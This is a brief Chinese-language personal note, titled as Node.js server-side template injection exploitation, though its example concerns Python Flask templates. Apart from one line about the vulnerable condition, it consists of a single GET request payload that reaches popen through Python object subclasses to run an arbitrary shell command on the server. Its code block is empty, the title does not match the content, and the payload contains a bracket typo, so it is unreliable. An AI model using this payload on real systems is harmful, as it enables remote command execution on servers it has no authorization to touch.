【笔记】Nodejs的SSTI模板注入漏洞利用
前言
Nodejs的SSTI模板注入漏洞利用
可能出现漏洞的环境
在后端语言渲染前端模板时传递了变量,并能通过参数改变变量的值
在Python中使用Flask框架举例
1 |
|
payload
<shell>:Shell命令
1 | GET http://127.0.0.1:80/404?key={{"".__class__.__bases__[0].__subclasses__{}[128].__init__.__globals__["popen"]("<shell>").read()}} |